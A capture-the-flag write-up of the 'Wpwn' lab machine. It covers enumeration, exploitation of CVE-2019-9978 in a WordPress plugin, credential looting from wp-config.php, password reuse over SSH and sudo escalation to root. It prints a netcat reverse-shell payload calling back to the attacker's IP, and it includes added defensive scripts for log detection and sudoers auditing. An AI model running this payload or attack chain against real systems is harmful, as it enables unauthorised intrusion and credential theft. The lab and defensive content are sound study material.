# Wpwn

## Nmap

```
sudo nmap 192.168.178.123 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Running `curl` against port 80 simply shows a basic greeting left on the machine by its creator.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6d409c4ea29c5db88db363f126a052138588e817%2Fimage.png?alt=media)

With nothing else interesting we move onto directory enumeration with `dirsearch.py`.

```
sudo python3 dirsearch.py -u http://192.168.178.123/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d9b2de0b383f89d6b18675734c1fac8bad5611f3%2Fimage.png?alt=media)

With the common.txt wordlist we find robots.txt and /wordpress. robots.txt contains nothing of interest.

Moving over to the /wordpress directory we get the following page.

![/wordpress](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1f41338cf623f9327592353bd0cc8d6d92c5a895%2Fimage.png?alt=media)

Other than this, the WordPress site contains no interesting information. From here we can run `WPScan` to identify further information.

```
wpscan --url http://192.168.178.123/wordpress/ --passwords /usr/share/wordlists/rockyou.txt
```

`WPScan` picks up the plugin 'social-warfare' as being installed and out of date.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2c301cc3e90b23bae472b739388e40f35867b2aa%2Fimage.png?alt=media)

Checking this against `searchsploit` reveals an RCE against the running version.

```
searchsploit -w social warfare 3.5.2
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e6b5e337d08e7243b7d2fa0e9e1b7c20d5c2110%2Fimage.png?alt=media)

The vulnerability has been assigned CVE-2019-9978.

Description:

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the `wp-admin/admin-post.php?swp_debug=load_options` `swp_url` parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

The following GitHub shows a PoC for this exploit.

<https://github.com/hash3liZer/CVE-2019-9978>

As per the GitHub description, we need to create a text file, hosted on our attacking machine, containing the command we want executed.

```
<pre>system('command')</pre>
```
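From the defender's side, the request shape in the CVE description above (a hit on `wp-admin/admin-post.php` carrying `swp_debug=load_options` plus an `swp_url` that points at a host other than the site itself) is easy to pick out of the web server's access log. The following is an added example, not code from this write-up or from the linked PoC repository: it assumes the Apache combined log format, takes `site_hosts` (the hostnames the site legitimately serves) as an assumed parameter, and runs over constructed sample lines. It is a log heuristic only; the actual fix is updating the plugin to 3.5.3 or later.

```python
"""Flag Apache access-log entries that match the CVE-2019-9978 request shape.

Added example (not part of the original write-up or the linked PoC).
Assumes the Apache "combined" log format and keys on the parameters named in
the CVE description: swp_debug=load_options together with an swp_url parameter.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined format: client ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_swp_debug_request(target, site_hosts):
    """Return a reason string when the request target matches the vulnerable endpoint usage."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-post.php"):
        return None
    qs = parse_qs(parts.query)
    if qs.get("swp_debug", [None])[0] != "load_options":
        return None
    swp_url = qs.get("swp_url", [None])[0]
    if swp_url is None:
        # The debug switch alone is unusual traffic; treat it as a probe.
        return "swp_debug=load_options without swp_url (probe)"
    host = urlsplit(swp_url).hostname
    if host and host not in site_hosts:
        # Options are being loaded from a host the site does not own: the exploit shape.
        return f"swp_url fetches remote payload from {host}"
    return "swp_debug=load_options with local swp_url"


def scan_log(lines, site_hosts):
    """Return one finding per matching line: client, time, status and the reason."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reason = is_swp_debug_request(rec["target"], site_hosts)
        if reason:
            hits.append({"client": rec["client"], "time": rec["time"],
                         "status": rec["status"], "reason": reason})
    return hits


# Constructed sample log lines (not taken from the original page).
SAMPLE_LOG = [
    '192.168.49.178 - - [10/Oct/2020:14:01:02 +0000] "GET /wordpress/wp-admin/admin-post.php'
    '?swp_debug=load_options&swp_url=http://192.168.49.178:443/test.txt HTTP/1.1" 200 512 "-" "python-requests/2.24.0"',
    '10.0.0.5 - - [10/Oct/2020:14:01:05 +0000] "GET /wordpress/ HTTP/1.1" 200 9140 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2020:14:02:11 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options HTTP/1.1" 200 300 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Oct/2020:14:03:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, {"192.168.178.123"}):
        print(hit)
```

Feed it the real access log with `scan_log(open(path), {"www.example.org"})`; the `site_hosts` set is what separates a legitimate local `swp_url` from a remote fetch, so populate it with every hostname the site answers on.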

First I hosted a `Python SimpleHTTPServer` on my attacking machine.

```
sudo python2 -m SimpleHTTPServer 443
```

I then downloaded the associated Python script and executed it as below.

```
python2 cve-2019-9978.py  --target http://192.168.178.123/wordpress/ --payload-uri http://192.168.49.178:443/test.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e82b2bb42b9f3dc88cc1dd7a7b0e0de2593c4df3%2Fimage.png?alt=media)

In the example above the command included in test.txt was `'id'`. From here I replaced the command with `'which nc'` to see if `netcat` is on the target machine and then ran the exploit again.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8fd628de7038b0c4e9ab9861d1b1c453d2978577%2Fimage.png?alt=media)

As `netcat` is installed we can replace the command in the test.txt file with that of a `netcat` reverse shell.

Contents of test.txt:

```
<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.178 80 >/tmp/f')</pre>
```

I then set a `netcat` listener on my attacking machine:

```
sudo nc -lvp 80
```

Running the exploit again hangs the script as we receive a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-33cb53f3c4dd570d0e8ec8f01c99da5485f45a2a%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4a182807b8577edf9c8b3c38fecd22821b564032%2Fimage.png?alt=media)

We then upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Moving back one directory in the shell, we can read `wp-config.php` for `MySQL` database credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aaba7fa2c5c4733d8b3eb34686314637dee704d6%2Fimage.png?alt=media)

We have gathered the credentials `wp_user:R3&]vzhHmMn9,:-5`. From here I logged into `MySQL` and took the WordPress administrator's hash. I was, however, unable to crack it. Looking on the box we have the user 'takis', so I decided to see if password reuse was in play and `SSH` in as takis.

```
ssh takis@192.168.178.123
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f91ac480f037e15413d1172dd305ce859f2a3167%2Fimage.png?alt=media)

Now that we are in as takis, I run `sudo -l` to check the `sudo` permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e17cb5bb478b86d9c773b6630f6b7dcba91b3c4c%2Fimage.png?alt=media)

It looks like we can run all commands as any user without a password. A simple `sudo /bin/bash` will spawn a root shell.
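The `sudo -l` result is the whole privilege-escalation step on this box, and it is also the easiest finding to catch before an attacker does. As an added example that is not part of the original write-up, the script below audits sudoers-style rules and grades the "ALL commands, no password" pattern. It parses the simplified `user HOST=(RUNAS) [TAG:] COMMANDS` line shape only (no aliases, `Defaults` options or `#include` handling), and the sample rules are constructed, with the takis line written to match the permission described above rather than copied from the box.

```python
"""Grade sudoers rules for the NOPASSWD-for-everything pattern.

Added example (not part of the original write-up). Handles the plain
'who host=(runas) [TAGS:] commands' shape; aliases, Defaults and includes
are out of scope and are skipped or reported as unparsed.
"""
import re

RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*'      # who  host=
    r'(?:\((?P<runas>[^)]*)\)\s*)?'                   # optional (runas[:group])
    r'(?P<tags>(?:[A-Z]+:\s*)*)'                      # zero or more TAG: entries
    r'(?P<cmds>.+)$'                                  # comma-separated commands
)


def parse_rule(line):
    """Parse one sudoers line; return None for blanks, comments, Defaults and unparsed lines."""
    line = line.split('#', 1)[0].strip()   # drop trailing comments
    if not line or line.startswith('Defaults'):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = [t for t in re.split(r'[:\s]+', m.group('tags')) if t]
    return {
        'who': m.group('who'),
        'host': m.group('host'),
        'runas': (m.group('runas') or 'root').strip(),   # sudo's default RunAs is root
        'tags': tags,
        'cmds': [c.strip() for c in m.group('cmds').split(',')],
    }


def risk_of(rule):
    """Return a list of findings for one parsed rule (empty list means nothing notable)."""
    findings = []
    all_cmds = any(c == 'ALL' for c in rule['cmds'])
    any_user = rule['runas'].split(':')[0].strip() == 'ALL'
    nopasswd = 'NOPASSWD' in rule['tags']
    if all_cmds and nopasswd:
        findings.append('HIGH: ALL commands without a password')
    elif all_cmds:
        findings.append('MEDIUM: ALL commands (password required)')
    elif nopasswd:
        findings.append('LOW: NOPASSWD on specific commands')
    if any_user and all_cmds:
        findings.append('runs as any user')
    return findings


def audit(lines):
    """Return (who, findings) pairs for every rule that produced at least one finding."""
    report = []
    for line in lines:
        rule = parse_rule(line)
        if rule is None:
            continue
        findings = risk_of(rule)
        if findings:
            report.append((rule['who'], findings))
    return report


# Constructed sample rules (not copied from the box); the takis line matches
# the "all commands, any user, no password" permission described in the write-up.
SAMPLE_SUDOERS = [
    'Defaults env_reset',
    'root ALL=(ALL:ALL) ALL',
    'takis ALL=(ALL) NOPASSWD: ALL',
    '%backup ALL=(root) NOPASSWD: /usr/bin/rsync   # scheduled backups only',
    'dev ALL=(ALL) ALL',
]

if __name__ == "__main__":
    for who, findings in audit(SAMPLE_SUDOERS):
        print(who, findings)
```

Run it over `/etc/sudoers` and the files in `/etc/sudoers.d` from a root shell; any HIGH entry for a user whose password is also reused elsewhere (the database account here) turns a web-application bug straight into root.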

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-059d5ad64121ad0feadaf62e480829722054fe71%2Fimage.png?alt=media)

